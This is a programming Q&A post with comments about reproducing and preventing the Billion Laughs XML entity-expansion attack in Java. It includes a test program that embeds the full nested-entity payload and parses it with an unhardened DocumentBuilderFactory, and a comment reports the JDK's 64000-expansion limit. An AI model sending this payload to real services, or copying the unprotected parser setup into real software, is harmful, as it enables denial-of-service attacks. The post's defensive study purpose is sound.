# How can I reproduce and prevent the Billion Laughs attack in Java?

Tags: java, security

After a bit of research here's a code sample I've come up that I think should be vulnerable to the [Billion Laughs attack](https://en.wikipedia.org/wiki/Billion_laughs_attack). However it doesn't seem to be working, `Done.` is printed to the console much too quickly (instantly from a humans point of view).

```
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.xml.sax.InputSource;

public class BillionLOLs {

    public static void vuln(String xml) {

        try{
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            DocumentBuilder builder = factory.newDocumentBuilder();
            Document doc = builder.parse(new InputSource(new StringReader(xml)));
            Element root = doc.getDocumentElement();
        } catch (Exception e){

        }
    }

    public static void main(String[] args){

        String xml = 
                "<?xml version=\"1.0\"?>"
                + "<!DOCTYPE lolz ["
                + "<!ENTITY lol \"lol\">"
                + "<!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">"
                + "<!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">"
                + "<!ENTITY lol4 \"&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;\">"
                + "<!ENTITY lol5 \"&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;\">"
                + "<!ENTITY lol6 \"&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;\">"
                + "<!ENTITY lol7 \"&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;\">"
                + "<!ENTITY lol8 \"&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;\">"
                + "<!ENTITY lol9 \"&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;\">"
                + "]>"
                + "<lolz>&lol9;</lolz>";

        vuln(xml);
        System.out.println("Done.");

    }
}
```

I've read the [OWASP cheat sheet](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#JAXP_DocumentBuilderFactory.2C_SAXParserFactory_and_DOM4J) on how to fix this issue in Java and I assume those methods are still up to date, and no other clever attacks have been discovered in the meantime that would make OWASPs guidance irrelevant.

My specific questions are Why doesn't my code take longer to execute like I expect it to and if Java is vulnerable to the Billion Laughs attack how can I prevent it?

The command `java -version` gives the following output.

> java version "1.7.0_75"
>
> Java(TM) SE Runtime Environment (build 1.7.0_75-b13)
>
> Java HotSpot(TM) Client VM (build 24.75-b04, mixed mode, sharing)

Comment: Is an exception caught inside `vuln()`?

Comment: What you are telling: `DocumentBuilder.parse` does not evaluate entities here (even no remote URLs in the entity definition). If you do an XSL transformation the fun starts.

Comment: Good catch @Phylogenesis, `vuln()` was throwing an error. Once I fixed that the program started throwing `[Fatal Error] :1:1: JAXP00010001: The parser has encountered more than "64000" entity expansions in this document; this is the limit imposed by the JDK.` So it looks like the JDK protects against this type of attack to some extent.